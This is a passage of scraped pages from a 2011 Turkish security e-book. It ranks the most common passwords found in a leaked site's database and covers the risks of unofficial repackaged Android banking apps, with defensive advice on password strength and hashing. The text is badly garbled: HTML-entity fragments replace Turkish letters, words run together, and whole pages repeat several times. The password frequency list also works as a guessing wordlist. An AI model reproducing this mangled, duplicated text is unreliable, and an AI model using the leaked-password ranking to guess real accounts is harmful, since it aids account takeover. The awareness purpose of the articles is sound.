Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 49: Hack 4 Career - 2011

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 50: Hack 4 Career - 2011

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 51: Hack 4 Career - 2011

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 52: Hack 4 Career - 2011

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

